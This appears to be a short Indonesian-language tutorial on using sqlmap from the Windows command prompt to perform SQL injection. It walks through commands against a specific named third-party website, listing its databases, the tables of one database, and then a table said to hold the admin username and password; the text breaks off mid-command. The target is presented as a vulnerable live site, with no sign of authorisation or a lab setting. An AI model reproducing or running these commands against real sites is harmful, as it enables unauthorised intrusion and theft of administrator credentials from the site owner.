SQLI Dengan Memakai Sqlmap Di Windows
Pertama yang harus di siapkan adalah SQLMAP(Cari Di Google) CMD Website Yang VULN Python)Cari Di Google) Yuk langsung ke tutornya : 1. Buka CMD(Command Prompt) 2.Lalu ketikkan cd c:/ sqlmap 3.Yang berwarna Merah Itu adalah lokasi tempat sqlmap nya 4.Lalu Ketik lagi di cmd,lalu enter sqlmap.py -u http://www.focalink.com.tw/product_en.php?classmaster=15 --dbs nb:yang berwarna merah itu adalah web yang VULN 5.Jika Web benar2 vuln,maka akan muncul seperti ini(Nama Databasenya) 6.Lalu untuk menampilkan isi dari DB nya kita ketikkan perintah berikut di cmd kita sqlmap.py -u http://www.focalink.com.tw/product_en.php?classmaster=15 -D focalink_focalink --tables Maka akan muncul seperti ini 7.lalu kita akan memunculkan isi dari tables di DB yang berisi username dan password admin,cth saya ambil dari tables sysconfig sqlmap.py -u http://www.focalink.com.tw/product_en.php?classmaster=15 -D focalink_focalink -T...